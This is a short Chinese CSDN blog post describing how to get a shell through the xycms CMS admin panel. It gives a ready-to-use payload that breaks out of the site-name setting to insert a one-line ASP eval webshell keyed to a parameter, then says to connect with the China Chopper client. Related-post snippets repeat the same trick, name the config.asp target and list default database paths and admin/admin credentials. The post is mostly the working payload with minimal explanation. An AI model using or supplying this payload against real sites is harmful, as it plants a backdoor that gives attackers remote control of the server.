xycms后台拿shell

最新推荐文章于 2023-02-14 10:38:13 发布
最新推荐文章于 2023-02-14 10:38:13 发布
阅读量4k 收藏
点赞数
分类专栏: 渗透测试 文章标签: 渗透 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shisongsong/article/details/53328987
版权
本文介绍了如何通过修改xycms后台的网站名称字段,插入恶意代码,从而成功获取服务器shell。详细过程包括了具体的操作步骤和利用的代码片段,以及连接菜刀进行进一步控制的URL。
摘要由CSDN通过智能技术生成


进入后台修改  网站名称    




xxx网站"%><%eval request("pass")%><%'


修改成功后,菜刀连接



最低0.47元/天 解锁文章
shisongsong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XYCMS留言板 v7.3
10-02
XYCMS留言板是以asp+access进行开发的asp留言板源码。 此版本完全,没有任何功能限制,不提供技术支持。不要相信任何网络上关于XYCMS留言板收费版本,唯一收取50元的是官方店铺里
渗透实战系列】xycms的一次漏洞挖掘
最新发布
书山上的云的博客
10-13 840
本次漏洞挖掘是用于记录某次实验中自建CMS靶场的漏洞挖掘情况。
XYCMS企业建站系统默认数据库、后台拿WebShell
qq_20466263的专栏
09-05 4557
默认数据库:xydata/xycms.mdb 后台是:admin 或者 systeam  帐号密码:admin admin
xycms登录后台详细教程(php+mysql)
白帽小学二年级的博客
12-17 4523
xycms登录后台详细教程(php+mysql)
XYCMSV3.6系统】ASP商会组织机构政府企业网站模板
百创科技
02-14 164
系统设置:进行系统相关基本信息设置,如网站名称,企业信息等基本信息。首页菜单管理:可以添加,删除菜单信息,打开窗口,是否显示,是否为头部导航或者底部导航栏。安全管理:看相关违规操作记录,查询攻击IP地址,自动封闭IP,管理SQL信息。精英企业家管理:对精英企业家内容进行管理,后台可以添加,修改,删除操作。商会/协会新闻中心管理:管理新闻信息内容,管理相关分类,添加或者删除。管理员管理:对超级管理员信息管理,可以进行添加,删除,修改等操作。会员企业管理:对会员企业内容进行管理,发布最新会员企业内容信息。
124.网络安全渗透测试—[CMS后台 getwebshell]—[xycms2.9后台 getwebshell]
qwsn
07-11 2084
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 登录后台---->系统设置---->网站名称后加上以下内容:蚁剑连接网站配置文件:http://www.xycms29.com:99/inc/config.asp (1)这种getwebshell的风险是很大的,插入出错会导致整个网站坏掉; (2)一般在asp里面,网站的配置文件就在/inc/config.asp里面; (3)配置内容不是插入数据库里面的,也不是从数据库里面读出来的,因此可以采用这种方法getwebshell: (
xycms.rar_xycms
09-22
XYCMS商业网站源码详解》 XYCMS是一款专为商业用途设计的网站内容管理系统,其核心在于提供高效、安全且易于操作的平台,帮助企业快速搭建个性化网站。本篇文章将深入探讨XYCMS的特性和使用方法,以帮助读者更好...
XYCMS企业建站系统
08-16
8. **后台管理**:系统提供一个直观且易于操作的后台管理界面,使管理员可以轻松管理网站内容、用户反馈以及进行系统设置。 9. **版本更新**:从文件名“xycms-utf8-v4.6”可以看出,XYCMS至少有4.6版本,这表明...
XYCMS留言板 v7.0
10-13
XYCMS留言板 v7.0是一款基于ASP编程语言和Access数据库技术构建的留言系统源代码。在深入了解这个系统之前,我们先来了解一下ASP和Access这两个关键组件。 ASP(Active Server Pages)是微软公司推出的一种服务器端...
xycms网站源码
07-08
网站源码XYCMS企业(公司)建站系统是为中国企业提供一站式网络解决方案的建站平台,我们一直致力于中文企业网站建设。
XYCMS企业建站商业版
04-28
XYCMS企业建站商业版,用来企业建站是不错的。
XYCMS企业建站系统最新官方版
04-02
XYCMS企业建站系统最新官方版,该源码是网站运行环境:ASP+ACCESS+html+utf8,优点:UTF8编码国际通用,不会出现乱码现象。网站功能:安全性:防SQL注入,自动锁定入侵的IP地址,防XSS攻击,具有很好的过滤系统,喜欢的朋友可以下载研究一下看看。 功能简述: 企业信息管理:包括基本信息管理,添加,在线报名信息管理,问答中心信息管理 新闻中心管理:管理新闻信息内容,管理相关分类,添加或者删除 产品内容管理:对产品类别进行管理,分为大类和小类,发布最新产品信息 客户案例管理:对客户案例内容进行管理 招聘信息管理:发布一些招聘信息 其他信息管理:查看管理员登录记录,首页视频内容管理,可以进行修改操作 系统设置:进行系统相关基本信息设置,如网站名称,企业信息等基本信息。可以管理是否关闭网站,注册是否审核,留言是否审核 LOGO/形象图片管理:首页LOGO管理 安全管理:看相关违规操作记录,查询攻击IP地址,自动封闭IP,管理SQL信息 安全设置:根据需要设置一些安全过滤信息 首页菜单管理:可以添加,删除菜单信息,打开窗口,是否显示,是否为头部导航或者底部导航栏 管理员管理:对超级管理员信息管理,可以进行添加,删除,修改等操作 更新记录: 1.更换编辑器,支持加水印 2.加上静态html生成接口 3.修正后台基本信息添加不上BUG 后台路径:admin/,用户名、密码:admin 该源码使用用途:爱好者学习或者研究,禁止用作商业建站。 本机测试环境:windowxp/windows7+IIS【必须此环境】 由于测试小工具“aspweb.exe”对utf8编码兼容性差,所以用户不要用此工具测试。
XYCMS代理商查询认证系统
04-06
XYCMS企业代理商验证查询程序系统是一个以asp+access进行开发的代理商认证系统。 软件介绍: 1.本程序开发环境:ASP+ACCESS 2.后台路径/system/,后台用户名,密码都是admin 3.程序网页编码utf8 4.要用IIS环境测试,不支持小旋风等简单测试工具。 简单功能简介: 1.后台代理商信息添加,修改,删除 2.管理员添加,修改,删除 3.程序系统设置,一些基本信息操作 开发背景: 现在电商发展盛行,一个企业的产品已经不仅仅企业一家在做电商或者微商,还有很多下面代理商在线上卖,导致很多消费者不知道哪个代理商为真,哪个为假,于是本人瞎忙活了几个小时简单做了个小系统供大家学习之用,一开始也想用证书形式表现,发现证书其实没有必要,查询验证为真代理商一般就OK了,后续发现不足,慢慢完善。感谢大家一致支持XYCMS。如喜欢XYCMS系统,多多支持我们。需要定做程序也可以联系我们定做的。 声明:本程序开发仓促,连简单美工才几个小时,难免会有不足之处,考虑不周还望理解,建议程序作为测试研究之用,切勿轻易用作商业建站。 发现BUG麻烦亲们把信息发我邮箱:364500483@qq.com或者在线联系QQ364500483。最后感谢站长网一直对我们的支持。
XYCMS装修设计公司源码系统 v3.2
09-30
XYCMS装修设计公司源码系统 功能简述: 企业信息管理:包括基本信息管理,添加,在线报名信息管理,问答中心信息管理 新闻中心管理:管理新闻信息内容,管理相关分类,添加或者
XYCMS留言板 v7.1
10-10
**XYCMS留言板 v7.1** 是一个基于ASP(Active Server Pages)技术和Access数据库构建的留言系统源代码。这个版本的XYCMS留言板是完整的,没有任何功能上的限制,为用户提供了一个全面的在线交流平台。然而,值得注意...
web项目---webShell漏洞
qq_37874262的博客
03-04 2194
最近公司产品在现场发现了一个名叫webShell的漏洞, 也不知道它是用什么软件检测出来的。但是总得解决啊,就在网上搜有关资料,发现关于这些漏洞方面的还挺有意思的。下面是搜索网上找到的一些解决办法。 让保存上存目录独立开来,目录权限只读不能执行 这一步从系统设计加以授权,无论你上次什么文件,都不可能执行到。就算我不做任何检测,你的文件都上存到这里了,也不会对我系统构成安全。(...
靶场笔记-----YXcms靶场
热门推荐
Zer0ooo的博客
11-21 1万+
靶场环境: 前言:YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。 1.如果看到是cms,先去搜集信息,百度一下该cms已出现的漏洞。我是根据这个网址发现的漏洞https://zhuanlan.zhihu.com/p/52099335 2.根据前言...
最新Xycms广告设计中心网站系统源码V4.7
rgtrfs的博客
09-27 309
xycms广告设计中心网站系统是以asp+access进行开发的广告公司网站。企业信息管理:包括基本信息管理,添加,在线报名信息管理,问答中心信息管理新闻中心管理:管理新闻信息内容,管理相关分类,添加或者删除。
xycms留言板存在逻辑缺陷漏洞
09-09
xycms留言板存在逻辑缺陷漏洞的原因可能是在处理用户输入时没有进行足够的验证和过滤。这可能导致各种安全问题,例如SQL注入、跨站脚本攻击等。 首先,如果xycms留言板没有对用户输入进行严格过滤和验证,攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值